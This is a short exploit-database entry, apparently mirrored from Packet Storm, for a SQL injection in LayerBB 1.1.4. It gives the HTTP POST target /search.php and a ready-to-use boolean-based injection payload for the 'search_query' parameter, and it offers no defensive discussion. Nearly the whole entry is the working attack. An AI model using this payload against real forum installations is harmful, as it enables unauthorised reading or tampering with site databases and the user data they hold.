Share 
## https://sploitus.com/exploit?id=PACKETSTORM:161519
# Exploit Title: LayerBB 1.1.4 - 'search_query' SQL Injection  
# Date: 2021-02-19  
# Exploit Author: Görkem Haşin  
# Version: 1.1.4  
# Tested on: Linux/Windows  
  
# POST /search.php HTTP/1.1  
# Host: Target  
  
Payload: search_query=Lffd') AND 8460=(SELECT (CASE WHEN (8460=8460) THEN 8460 ELSE (SELECT 1560 UNION SELECT 2122) END))-- -&search_submit=Search